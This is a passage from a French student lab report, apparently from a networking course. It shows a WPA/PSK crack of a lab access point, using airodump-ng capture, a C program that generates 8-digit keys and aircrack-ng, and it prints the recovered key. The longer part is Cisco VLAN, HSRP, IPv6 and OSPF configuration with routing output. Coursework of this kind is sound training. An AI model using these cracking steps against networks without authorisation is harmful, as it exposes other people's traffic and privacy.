&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
